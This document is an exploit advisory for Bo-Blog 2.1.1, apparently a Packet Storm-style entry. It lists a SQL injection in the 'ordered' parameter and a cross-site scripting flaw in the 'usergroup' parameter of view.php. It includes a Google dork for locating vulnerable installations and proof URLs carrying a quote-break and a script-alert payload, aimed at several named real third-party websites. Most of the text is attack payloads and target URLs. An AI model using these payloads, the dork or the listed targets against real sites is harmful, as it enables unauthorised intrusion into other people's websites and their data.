Bo-Blog version 2.1.1 suffers from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
51e422abe7c61a58f5b996345b1b79b62b914c7633b3c3eed8540e5b23475ead
# Exploit Title : Bo-Blog 2.1.1 Multiple Vulnerabilites
#****************************************************************************
# Exploit Author : Ashiyane Digital Security Team
#************************************************
# Official site : https://www.bo-blog.com/
# Tested on: Windows,Linux
#*************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Powered by Bo-Blog 2.1.1"
#///////////////////////////////////////////////
#
# Exploit 1 : Sql Injection
#
# Location : /view.php?go=userlist&ordered=1[Sql Injection]
#
#
# Proof:
#
# https://www.landsaywilson.com//view.php?go=userlist&ordered=1%27
#
# https://itaoblog.com/view.php?go=userlist&ordered=1%27
#
# https://www.landsaywilson.com//view.php?go=userlist&ordered=1%27
#
# https://www.9enjoy.com/view.php?go=userlist&ordered=1%27
#
# https://www.hongcn.com/en/view.php?go=userlist&ordered=1%27
-----------------------------------------------------------------------------
# Exploit 2 : Cross site scripting
#
# Location : /view.php?go=userlist&ordered=1&usergroup=[xss]
#
# Location : /blog//view.php?go=userlist&ordered=1&usergroup=[xss]
#
#
# Proof:
#
#
https://itaoblog.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# www.landsaywilson.com//view.php?go=userlist&ordered=1&usergroup=
"/><script>alert(1);</script>
#
#
https://www.boneboy.net/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
https://itlife365.com/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
https://www.hongcn.com/en/view.php?go=userlist&ordered=1&usergroup=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
##############--------
discovered by : ACC3SS
##############--------